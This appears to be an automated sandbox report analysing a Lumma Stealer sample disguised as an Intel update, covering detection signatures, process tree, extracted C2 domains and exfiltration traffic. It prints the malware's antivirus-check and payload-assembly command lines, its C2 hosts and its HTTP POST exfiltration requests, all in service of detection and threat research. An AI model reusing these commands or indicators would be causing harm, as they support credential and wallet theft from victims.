Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
[UPD]Intel_Unit.2.1.exe

Overview

General Information

Sample name:[UPD]Intel_Unit.2.1.exe
Analysis ID:1585387
MD5:25b4bac0866214df0bcb32a8dc280555
SHA1:58513411b725c0f264013acacaba7fe069208aa7
SHA256:17e8ebdf1c3303f6c9538e9998e533962aa732a1356434d6cf78ab353f3a9f06
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to resolve many domain names, but no domain seems valid
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • [UPD]Intel_Unit.2.1.exe (PID: 4196 cmdline: "C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe" MD5: 25B4BAC0866214DF0BCB32A8DC280555)
    • cmd.exe (PID: 5128 cmdline: "C:\Windows\System32\cmd.exe" /c move Cloudy Cloudy.cmd & Cloudy.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 5588 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5608 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 6704 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 2448 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6636 cmdline: cmd /c md 686536 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 5672 cmdline: extrac32 /Y /E Justify MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 2328 cmdline: findstr /V "Backing" Kelly MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 3544 cmdline: cmd /c copy /b 686536\Hugo.com + Ware + Sanyo + Pg + Folk + Lifetime + Robert + Enlarge + Hence 686536\Hugo.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 6840 cmdline: cmd /c copy /b ..\Selection + ..\Suse + ..\Illustrations + ..\Alerts + ..\Smart + ..\Steps + ..\Lovers y MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Hugo.com (PID: 6596 cmdline: Hugo.com y MD5: 62D09F076E6E0240548C2F837536A46A)
      • choice.exe (PID: 5264 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["noisycuttej.shop", "abruptyopsn.shop", "framekgirus.shop", "wholersorie.shop", "cloudewahsj.shop", "tirepublicerj.shop", "rabidcowse.shop", "lastlossunbag.click", "nearycrepso.shop"], "Build id": "HpOoIh--@MrSalt"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      0000000D.00000003.2716593365.0000000001B41000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000D.00000003.2717609537.0000000001B41000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: Hugo.com PID: 6596JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Process Memory Space: Hugo.com PID: 6596JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: Hugo.com PID: 6596JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                Click to see the 1 entries

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Cloudy Cloudy.cmd & Cloudy.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5128, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 2448, ProcessName: findstr.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T15:45:55.742966+010020283713Unknown Traffic192.168.2.650736104.102.49.254443TCP
                2025-01-07T15:45:56.841787+010020283713Unknown Traffic192.168.2.650737104.21.64.1443TCP
                2025-01-07T15:45:57.643942+010020283713Unknown Traffic192.168.2.650738104.21.64.1443TCP
                2025-01-07T15:45:58.807522+010020283713Unknown Traffic192.168.2.650739104.21.64.1443TCP
                2025-01-07T15:45:59.958646+010020283713Unknown Traffic192.168.2.650740104.21.64.1443TCP
                2025-01-07T15:46:01.049260+010020283713Unknown Traffic192.168.2.650741104.21.64.1443TCP
                2025-01-07T15:46:02.386841+010020283713Unknown Traffic192.168.2.650742104.21.64.1443TCP
                2025-01-07T15:46:03.635728+010020283713Unknown Traffic192.168.2.650743104.21.64.1443TCP
                2025-01-07T15:46:04.797695+010020283713Unknown Traffic192.168.2.650744104.21.64.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T15:45:57.172707+010020546531A Network Trojan was detected192.168.2.650737104.21.64.1443TCP
                2025-01-07T15:45:58.137343+010020546531A Network Trojan was detected192.168.2.650738104.21.64.1443TCP
                2025-01-07T15:46:05.278650+010020546531A Network Trojan was detected192.168.2.650744104.21.64.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T15:45:57.172707+010020498361A Network Trojan was detected192.168.2.650737104.21.64.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T15:45:58.137343+010020498121A Network Trojan was detected192.168.2.650738104.21.64.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T15:45:54.902008+010020585981Domain Observed Used for C2 Detected192.168.2.6612131.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T15:45:54.988060+010020586061Domain Observed Used for C2 Detected192.168.2.6506991.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T15:45:54.929024+010020586101Domain Observed Used for C2 Detected192.168.2.6613041.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T15:45:54.878018+010020586161Domain Observed Used for C2 Detected192.168.2.6592381.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T15:45:54.953023+010020586181Domain Observed Used for C2 Detected192.168.2.6635951.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T15:45:54.972074+010020586221Domain Observed Used for C2 Detected192.168.2.6603131.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T15:45:54.941156+010020586281Domain Observed Used for C2 Detected192.168.2.6516251.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T15:45:54.914008+010020586321Domain Observed Used for C2 Detected192.168.2.6525581.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T15:46:02.735849+010020480941Malware Command and Control Activity Detected192.168.2.650742104.21.64.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T15:45:56.253659+010028586661Domain Observed Used for C2 Detected192.168.2.650736104.102.49.254443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: noisycuttej.shopURL Reputation: Label: malware
                Source: framekgirus.shopURL Reputation: Label: malware
                Source: rabidcowse.shopURL Reputation: Label: malware
                Source: wholersorie.shopURL Reputation: Label: malware
                Source: tirepublicerj.shopURL Reputation: Label: malware
                Source: https://sputnik-1985.com/i~Avira URL Cloud: Label: malware
                Source: https://sputnik-1985.com/apiAvira URL Cloud: Label: malware
                Source: https://sputnik-1985.com/LOXAvira URL Cloud: Label: malware
                Source: https://sputnik-1985.com/rAvira URL Cloud: Label: malware
                Source: https://sputnik-1985.com:443/apialAvira URL Cloud: Label: malware
                Source: https://sputnik-1985.com/SiteAvira URL Cloud: Label: malware
                Source: https://sputnik-1985.com/tAvira URL Cloud: Label: malware
                Source: lastlossunbag.clickAvira URL Cloud: Label: malware
                Source: https://sputnik-1985.com/api0Avira URL Cloud: Label: malware
                Source: https://sputnik-1985.com/apilaAvira URL Cloud: Label: malware
                Source: https://sputnik-1985.com/apijAvira URL Cloud: Label: malware
                Source: https://sputnik-1985.com/apijhhCfAvira URL Cloud: Label: malware
                Source: https://lastlossunbag.click/apiAvira URL Cloud: Label: malware
                Source: https://sputnik-1985.com/Avira URL Cloud: Label: malware
                Source: https://sputnik-1985.com/aAvira URL Cloud: Label: malware
                Source: 0000000D.00000003.2652978700.00000000048F2000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["noisycuttej.shop", "abruptyopsn.shop", "framekgirus.shop", "wholersorie.shop", "cloudewahsj.shop", "tirepublicerj.shop", "rabidcowse.shop", "lastlossunbag.click", "nearycrepso.shop"], "Build id": "HpOoIh--@MrSalt"}
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.6% probability
                Source: 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
                Source: 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmpString decryptor: rabidcowse.shop
                Source: 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmpString decryptor: noisycuttej.shop
                Source: 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
                Source: 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmpString decryptor: framekgirus.shop
                Source: 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmpString decryptor: wholersorie.shop
                Source: 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
                Source: 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmpString decryptor: nearycrepso.shop
                Source: 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmpString decryptor: lastlossunbag.click
                Source: 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmpString decryptor: HpOoIh--@MrSalt
                Source: [UPD]Intel_Unit.2.1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:50736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:50737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:50738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:50739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:50740 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:50741 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:50742 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:50743 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:50744 version: TLS 1.2
                Source: [UPD]Intel_Unit.2.1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
                Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F7DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_00F7DC54
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F8A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00F8A087
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F8A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00F8A1E2
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F7E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,13_2_00F7E472
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F8A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,13_2_00F8A570
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F866DC FindFirstFileW,FindNextFileW,FindClose,13_2_00F866DC
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F4C622 FindFirstFileExW,13_2_00F4C622
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F873D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,13_2_00F873D4
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F87333 FindFirstFileW,FindClose,13_2_00F87333
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.comCode function: 13_2_00F7D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_00F7D921
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2058616 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nearycrepso .shop) : 192.168.2.6:59238 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058598 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abruptyopsn .shop) : 192.168.2.6:61213 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058622 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rabidcowse .shop) : 192.168.2.6:60313 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058628 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tirepublicerj .shop) : 192.168.2.6:51625 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058632 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wholersorie .shop) : 192.168.2.6:52558 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058610 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (framekgirus .shop) : 192.168.2.6:61304 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058618 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (noisycuttej .shop) : 192.168.2.6:63595 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058606 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cloudewahsj .shop) : 192.168.2.6:50699 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50742 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50737 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50737 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50744 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:50736 -> 104.102.49.254:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50738 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50738 -> 104.21.64.1:443
                Source: Malware configuration extractorURLs: noisycuttej.shop
                Source: Malware configuration extractorURLs: abruptyopsn.shop
                Source: Malware configuration extractorURLs: framekgirus.shop
                Source: Malware configuration extractorURLs: wholersorie.shop
                Source: Malware configuration extractorURLs: cloudewahsj.shop
                Source: Malware configuration extractorURLs: tirepublicerj.shop
                Source: Malware configuration extractorURLs: rabidcowse.shop
                Source: Malware configuration extractorURLs: lastlossunbag.click
                Source: Malware configuration extractorURLs: nearycrepso.shop
                Source: unknownDNS traffic detected: query: nearycrepso.shop replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: rabidcowse.shop replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: tirepublicerj.shop replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: cloudewahsj.shop replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: lastlossunbag.click replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: wholersorie.shop replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: framekgirus.shop replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: noisycuttej.shop replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: abruptyopsn.shop replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: EDfttWxgFMWaHfidSCzybfKyg.EDfttWxgFMWaHfidSCzybfKyg replaycode: Name error (3)
                Source: global trafficTCP traffic: 192.168.2.6:50731 -> 162.159.36.2:53
                Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
                Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50739 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50741 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50742 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50744 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50740 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50737 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50738 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50736 -> 104.102.49.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50743 -> 104.21.64.1:443
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 81Host: sputnik-1985.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6H7HXKT5W9NQTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12831Host: sputnik-1985.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ETDM57XEJAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15059Host: sputnik-1985.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IMCRUI6YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19905Host: sputnik-1985.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6KRRDE5XR5UF0LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 901Host: sputnik-1985.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RI2MFGUIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1074Host: sputnik-1985.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 116Host: sputnik-1985.com
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
